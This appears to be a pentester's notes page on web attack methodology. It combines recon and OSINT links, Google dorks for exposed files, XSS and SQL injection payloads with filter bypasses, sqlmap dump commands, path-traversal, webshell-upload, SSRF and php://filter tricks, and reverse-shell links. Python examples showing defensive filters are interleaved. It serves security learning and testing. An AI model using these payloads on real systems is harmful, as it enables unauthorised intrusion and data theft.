- https://github.com/wiiwu959/Pentest-Record
- https://github.com/stevenyu113228/My-Security-Resources
- https://github.com/we1h0/redteam-tips
- https://github.com/Wh0ale/SRC-experience
- https://github.com/0verSp4ce/DoraBox
- https://github.com/infosecn1nja/Red-Teaming-Toolkit
- https://github.com/safe6Sec/PentestNote
- https://github.com/ghealer/TaoTie
- rustscan:
  wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb
  sudo dpkg -i rustscan_2.0.1_amd64.deb
  rustscan -a <ip>
- https://tineye.com/
- https://pimeyes.com/en
- image forensics & steganography
- https://sitereport.netcraft.com/
- https://dnsdumpster.com/
- https://securitytrails.com/dns-trails
- https://talosintelligence.com/reputation_center/
- https://www.ipaddress.com/
- https://www.twnic.tw/whois_n.php
- https://whois.tanet.edu.tw/
- https://tools.keycdn.com/traceroute
- https://web-check.xyz/
- https://www.webhostingsecretrevealed.net/zh-TW/
- https://www.virustotal.com/gui/home/url
- https://crt.sh/
- https://builtwith.com/zh/
- https://web.archive.org/
- https://verify-email.org/
- https://mxtoolbox.com/EmailHeaders.aspx
- https://www.ipaddress.com/trace-email.html
- https://epieos.com/
- target asset reconnaissance: https://intelx.io/
- intelligence lookup: https://phonebook.cz/
- https://www.exploit-db.com/
- https://dorksearch.com/
- https://pentest-tools.com/information-gathering/google-hacking#
- sensitive directories:
  - index of:/robots.txt
  - index of:/.svn
  - index of:/.git
  - index of:/.htaccess
  - ...
  - inurl:access.log
  - inurl:error.log
  - inurl:"admin"
  - ...
  - inurl:"admin.php"
  - inurl:"login.aspx"
  - inurl:"login.php"
  - ...
  - inurl:"phpMyAdmin"
  - inurl:"access.log"
  - ...
- use the inurl operator to filter flexibly, e.g. for Taiwanese domains: inurl:.tw, site:.tw
- JS leak: https://github.com/Roc-L8/JSFinderPlus
- .git
- .svn
- robots.txt
- .htaccess
- web.config
connect commands:
  ftp <IP>
  telnet <IP>
  nc -C
1. Find the injection point:
   Reflected XSS often appears in search boxes, URLs and login pages (most likely in GET parameters).
   Stored XSS often appears in message boards (留言板); you can find them with Google hacking: intext:"留言板" AND site:xxx.xxx.xxx, intitle:"留言板" AND site:xxx.xxx.xxx
2. Inject a basic payload and watch the response:
   I usually use "><script>alert(1)</script>; the common outcomes are:
   - the alert box pops directly
   - <script> gets blocked --> try a bypass:
     - switch tag (<iframe>, <img>)
     - encoding (URL encode, double URL encode, HTML entities...)
     - double tag (<scr<script>ipt>alert(1)</scr</script>ipt>)
     - mixed case (<ScRiPt>alert(1)</ScRiPt>)
     - double tag + mixed case (<ScR<script>IpT>)
3. Right-click --> Inspect to find where the input lands; it usually shows up somewhere in the page.
4. Keep adapting the payload to the source code, watching for possible filters and applying the bypasses flexibly.
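To see why the double-tag and mixed-case variants in step 2 get past a blocklist filter, here is an added Python example (my own, not code from this page or any project it links): a naive single-pass `<script>` stripper beside a case-insensitive fixpoint stripper and plain output encoding. The function names and the PAYLOADS dictionary are mine; the payload strings are constructed from the list above.

```python
import html
import re

# Constructed inputs mirroring the bypass variants listed in step 2
PAYLOADS = {
    "plain": '"><script>alert(1)</script>',
    "double_tag": '"><scr<script>ipt>alert(1)</scr</script>ipt>',
    "mixed_case": '"><ScRiPt>alert(1)</ScRiPt>',
    "double_tag_mixed": '"><ScR<script>IpT>alert(1)</ScR</script>IpT>',
}

# What a typical blocklist filter matches: exact, lowercase, once
NAIVE_SCRIPT_TAG = re.compile(r"</?script>")
# Case-insensitive, tolerates attributes
ANY_SCRIPT_TAG = re.compile(r"</?script\b[^>]*>", re.IGNORECASE)


def naive_filter(value: str) -> str:
    """Single pass, case-sensitive removal of <script> tags (the weak filter).
    Removing the inner tag of <scr<script>ipt> reassembles a working <script>."""
    return NAIVE_SCRIPT_TAG.sub("", value)


def contains_script_tag(value: str) -> bool:
    """Detection helper: does a <script ...> tag survive, in any case?"""
    return re.search(r"<script\b", value, re.IGNORECASE) is not None


def fixpoint_filter(value: str) -> str:
    """Case-insensitive removal repeated until nothing changes. Closes the
    double-tag trick, but it is still a blocklist: use it only as defence in
    depth behind output encoding."""
    while True:
        stripped = ANY_SCRIPT_TAG.sub("", value)
        if stripped == value:
            return stripped
        value = stripped


def escape_for_html(value: str) -> str:
    """Output encoding: the input can no longer close an attribute or open a tag,
    so no bypass variant matters."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, "naive ->", naive_filter(payload))
        print(name, "fixpoint ->", fixpoint_filter(payload))
        print(name, "escaped ->", escape_for_html(payload))
```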
Basic payload:
- "><script>alert(1)</script>
- '>alert(1)</script>
- <iframe onload="alert(1)"></iframe>
- <script>alert(1)</script>
filter bypass:
- [%27al\x65rt%27](document.domain);//
- window['alert'](0)
- parent['alert'](1)
- self['alert'](2)
- top['alert'](3)
- this['alert'](4)
- frames['alert'](5)
- content['alert'](6)
- constructor.constructor("aler"+"t(3)")();
- [].filter.constructor('ale'+'rt(4)')();
- top["al"+"ert"](5);
- top[8680439..toString(30)](7);
- top[/al/.source+/ert/.source](8);
- top['al\x65rt'](9);
by https://medium.com/@tobydavenn/dom-xss-on-a-gov-domain-bypassing-waf-93daec67fda9 https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309
- https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
- https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec
- https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf
- https://netsec.expert/posts/xss-in-2021/
- https://www.gushiciku.cn/pl/plU2/zh-tw
- https://xss.js.org/#/
test:
http://example.com?id=1'
http://example.com?id=' or 1=1 --
http://example.com?id=' or 1=2 --
http://example.com?id=1%27
1. Find the injection point:
   SQL injection often appears in search boxes, URLs and login pages (where it may allow an unauthorized login) (most likely in GET parameters).
2. Inject a basic payload and watch the response:
   I usually use ' or 1=1 -- or admin' or 1=1 --; the common outcomes are:
   - logged in directly
   - wrong username/password or some other error
   - nothing at all
   The bypass methods are much the same as for XSS:
   - encoding bypass
   - whitespace: %20, +, ...
   - mixed-case bypass
   - comment bypass (mind the syntax of the particular DB): -- can be replaced with /**/, #, ...
GET method: sqlmap -u "http://example.com?id=1" -p <parameter>   (-p specifies the parameter to test)
POST method:
  sqlmap -u "http://example.com" --method POST
  sqlmap -r post.txt -p <parameter>
HTTP header SQL injection: --headers or -H, putting * where the header value goes
add --dump, --dbs, --random-agent
--dump --> dump the database; --dump -D <db> --tables --> get the table names; --dump -D <db> -T <table> --columns --> get the column names; --dump -D <db> -T <table>
protocols:
  file://
  gopher://
  - ...
Path traversal:
  file:../../../../../../../../{path}   (the more ../ the better)
- bypass:
  ....//....//....//....//....//
  ../\../\../\../\../\../\
  - URL encode, double URL encode
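As an added example (my own, not from this page or any project it links), here is the defender's side of the ....// and ../\ variants above in Python: a single-pass ../ strip that the bypass turns straight back into ../, next to a check that undoes repeated URL encoding, normalizes the path and accepts it only if it stays under a base directory. BASE_DIR, the REQUESTS strings and the function names are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/files"   # constructed document root for the example

# Constructed inputs mirroring the variants listed above
REQUESTS = {
    "plain": "../../../../etc/passwd",
    "double_dot_slash": "....//....//....//....//etc/passwd",
    "backslash_mix": "../\\../\\../\\../\\etc/passwd",
    "double_encoded": "%252e%252e%252f%252e%252e%252fetc/passwd",
    "benign": "reports/2023/q1.pdf",
}


def naive_sanitize(path: str) -> str:
    """Single-pass removal of '../' (the weak filter).
    Each '....//' loses its middle '../' and collapses to a fresh '../'."""
    return path.replace("../", "")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated URL encoding before any check, with a bounded number
    of rounds so a hostile input cannot keep the loop busy."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_join(base: str, user_path: str):
    """Decode, treat backslashes as separators, normalize, then accept the
    path only if it is still under base. Returns the resolved path or None."""
    candidate = fully_decode(user_path).replace("\\", "/")
    resolved = posixpath.normpath(posixpath.join(base, candidate))
    if resolved == base or resolved.startswith(base + "/"):
        return resolved
    return None


if __name__ == "__main__":
    for name, req in REQUESTS.items():
        print(f"{name:17} naive -> {naive_sanitize(req)}")
        print(f"{name:17} safe  -> {safe_join(BASE_DIR, req)}")
```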
Basic webshell filename:
shell.php
shell.asp
bypass filename:
shell.php
shell.pHp
shell.PhP
shell.php;jpg
shell.php.jpg
<?php phpInfo();?>
http://example.com?url={payload}
http://example.com?lang={payload}
127.0.0.1
localhost
192.168.0.1
127.00000.00000.00001
127.0.1
127.1
http://example.com?url=file:///etc/passwd   # for Linux
http://example.com?url=...
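For the loopback shorthand listed above (127.1, 127.0.1, 127.00000.00000.00001) and the file:// and gopher:// schemes, here is an added Python validator (my own, not from this page) for a user-supplied fetch URL: it accepts only canonical IP literals via the ipaddress module, blocks non-http(s) schemes and non-global addresses, and hands plain hostnames back for resolve-then-check, which this offline example does not perform. The function names, ALLOWED_SCHEMES, BLOCKED_NAMES and the SAMPLES URLs are constructed.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
BLOCKED_NAMES = {"localhost"}   # extend with internal/metadata hostnames


def looks_like_ip_shorthand(host: str) -> bool:
    """Digits and dots only but not a canonical dotted quad: 127.1, 127.0.1,
    127.00000.00000.00001. Lenient resolvers (inet_aton) accept all of these."""
    return host != "" and all(c.isdigit() or c == "." for c in host)


def classify_target(url: str) -> str:
    """Return 'allow', 'resolve-then-check' or 'blocked: <reason>'."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return "blocked: scheme " + (parts.scheme or "<none>")
    host = parts.hostname
    if not host:
        return "blocked: no host"
    if host in BLOCKED_NAMES:
        return "blocked: name " + host
    try:
        addr = ipaddress.ip_address(host)   # strict: rejects shorthand forms
    except ValueError:
        if looks_like_ip_shorthand(host):
            return "blocked: non-canonical IP literal " + host
        # A real hostname: resolve it and run the same address check on every
        # returned address (left out here to keep the example offline).
        return "resolve-then-check"
    if not addr.is_global:   # loopback, private, link-local, reserved, ...
        return "blocked: non-global address " + str(addr)
    return "allow"


# Constructed sample URLs covering the variants listed above
SAMPLES = [
    "http://127.0.0.1/", "http://localhost/", "http://192.168.0.1/",
    "http://127.00000.00000.00001/", "http://127.0.1/", "http://127.1/",
    "http://[::1]/", "file:///etc/passwd", "gopher://127.0.0.1:25/",
    "http://1.2.3.4/", "http://example.com/",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(f"{u:32} -> {classify_target(u)}")
```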
- php://filter/convert.base64-encode/resource=index.php
- php://filter/convert.base64-decode/resource=index.php
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/735b0d2277b39cda75af2855362fd5e8ae50b3db/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
- generator: https://www.revshells.com/
- https://gtfobins.github.io/#
- https://github.com/rebootuser/LinEnum
- https://github.com/mzet-/linux-exploit-suggester
- exploits: https://github.com/SecWiki/linux-kernel-exploits
- https://github.com/AlessandroZ/BeRoot/tree/master/Linux